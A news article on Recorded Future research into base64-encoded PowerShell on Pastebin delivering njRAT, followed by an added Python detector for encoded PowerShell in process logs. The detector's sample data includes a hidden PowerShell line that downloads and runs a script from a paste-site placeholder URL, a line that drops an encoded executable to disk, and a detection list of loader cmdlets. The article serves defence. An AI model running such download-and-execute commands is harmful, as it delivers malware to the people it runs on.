Why Are Hackers Encoding Malicious PowerShell Scripts, and How Do You Get Rid of Them?
Attackers are hiding base64-encoded malicious PowerShell scripts in plain sight on paste sites such as Pastebin and using them to infect computers with the njRAT remote access Trojan.
The details come from research published in a blog post by Recorded Future, a threat intelligence firm.
A law-enforcement bulletin issued on Nov. 17 prompted the researchers to look into the subject. The bulletin, circulated across the United States, warned of an emerging threat group skilled in attacks on both private and public entities.
“In this case the attacker works on the reasonable assumption that individuals working closely with technology are not restricted in their access to text-based resources, like paste sites and code repositories,” wrote Chris Pace, Recorded Future’s marketing and content director for the EMEA region, in the blog post. “They also take advantage of the fact that security at the web layer may not be able to decode and identify that this program is malicious,” Pace added.
Recorded Future then used its threat intelligence analysis engine to scour online code repositories, criminal forums and paste sites for references to malicious PowerShell scripts.
The researchers found malicious base64-encoded PowerShell scripts sitting on a Pastebin page; the scripts infect computers with the njRAT remote access Trojan.
Pace writes that the attackers rely on two things: technical staff are rarely blocked from text-based resources, and security at the web layer often cannot decode the encoded script and recognize it as malicious.
The researchers then described the specific techniques they saw used in the wild.
In one case, an individual in Saudi Arabia was hiding a malicious PowerShell script on a Pastebin page; the aim of the individual, or the group behind them, was to distribute the njRAT remote access Trojan.
According to the report, the attacker first used phishing emails and websites to plant a downloader-type program on victims' computers.
“This ‘first-stage implant’ would then retrieve a base64-encoded portable executable (PE) file from a Pastebin page. The PE file would then call back to Pastebin once more to collect its own payload, namely njRAT,” Pace writes in the blog post.
“This is a very clever attack in the way this was all… strung together,” said Levi Gundert, Recorded Future’s VP of intelligence and strategy, who authored the report.
“The key takeaway for defenders is… what is the next evolution of this going to look like and how are you going to detect it?” he added.
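Gundert's question is the practical one, and the first hop of the chain described above is the easiest place to start: the encoding that defeats a web proxy is trivial to undo on the endpoint, where PowerShell's own command line is logged. The script below is an added example, not code from Recorded Future's report or blog post. It decodes the base64 handed to -EncodedCommand (which carries UTF-16LE script text), decodes any inline [Convert]::FromBase64String literal and checks whether it is a PE file, then scores what it finds against paste-site domains and loader cmdlets. The sample log lines are constructed, the paste URL path is a placeholder, and the indicator lists and the scoring threshold are this example's assumptions rather than the report's detection logic.

```python
"""Decode base64-wrapped PowerShell from process-creation logs and score the
indicators of the paste-site loader chain the article describes.

Added example: the log lines are constructed, and the indicator lists and
scoring threshold are assumptions of this example, not Recorded Future's.
"""
import base64
import binascii
import re

# Assumed indicator lists for this example (not from the report).
PASTE_SITES = ("pastebin.com", "paste.ee", "hastebin.com", "ghostbin.com")
LOADER_TOKENS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
                 "net.webclient", "frombase64string", "start-process")

# -e, -ec, -enc, -EncodedCommand ... followed by a base64 token.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
# Inline literal handed to [Convert]::FromBase64String('...').
B64_LITERAL = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]\s*\)", re.I)


def decode_encoded_command(token):
    """-EncodedCommand carries UTF-16LE script text; return it, or None
    when the token is not valid base64."""
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-16-le", errors="replace")


def classify_blob(token):
    """Decode an inline base64 literal and say what the bytes look like."""
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return "invalid-base64", b""
    if raw[:2] == b"MZ":                      # DOS header: a dropped PE file
        return "pe-executable", raw
    text = raw.decode("utf-8", errors="ignore")
    if text and all(c.isprintable() or c in "\r\n\t" for c in text):
        return "script-text", raw
    return "binary", raw


def analyze(cmdline):
    """Look through the base64 layers of one PowerShell command line and
    return the decoded -EncodedCommand text, the indicators found, a score
    and a verdict (score >= 3 is treated as suspicious in this example)."""
    layers = [cmdline]                        # raw line plus what we decode
    indicators = set()
    m = ENC_FLAG.search(cmdline)
    decoded = decode_encoded_command(m.group(1)) if m else None
    if decoded is not None:
        indicators.add("encoded-command")
        layers.append(decoded)
    for layer in list(layers):                # one more hop for inline blobs
        for literal in B64_LITERAL.findall(layer):
            kind, raw = classify_blob(literal)
            indicators.add("blob:" + kind)
            if kind == "script-text":
                layers.append(raw.decode("utf-8", errors="ignore"))
    for layer in layers:
        low = layer.lower()
        for site in PASTE_SITES:
            if site in low:
                indicators.add("paste-site:" + site)
        for tok in LOADER_TOKENS:
            if re.search(r"\b" + re.escape(tok) + r"\b", low):
                indicators.add("token:" + tok)

    def weight(ind):                          # assumed weights
        if ind == "blob:pe-executable":
            return 3
        if ind.startswith("paste-site:"):
            return 2
        return 1

    score = sum(weight(i) for i in indicators)
    return {"decoded": decoded, "indicators": sorted(indicators),
            "score": score, "suspicious": score >= 3}


# Constructed sample command lines (the command-line field of a
# process-creation event); the paste URL path is a placeholder.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')"
PE_STUB = base64.b64encode(b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 24).decode()
SAMPLE_LOGS = [
    # hidden PowerShell pulling the next stage from a paste site
    "powershell.exe -NoP -W Hidden -Enc "
    + base64.b64encode(STAGE1.encode("utf-16-le")).decode(),
    # second stage: a base64-encoded PE written to disk
    "powershell.exe -c \"$b=[Convert]::FromBase64String('" + PE_STUB
    + "');[IO.File]::WriteAllBytes('C:\\Users\\Public\\u.exe',$b)\"",
    # benign administrative use of -EncodedCommand
    "powershell.exe -EncodedCommand "
    + base64.b64encode("Get-Service -Name Spooler".encode("utf-16-le")).decode(),
    "powershell.exe -Command Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        r = analyze(line)
        print(r["score"], r["suspicious"], r["indicators"], (r["decoded"] or "")[:60])
```

Run against a real Sysmon or Security 4688 feed, the interesting part is the score distribution on the benign -EncodedCommand traffic your own administrators generate: the third sample line shows why the encoding flag alone is not a verdict, and why the paste-site and PE-blob indicators carry the weight.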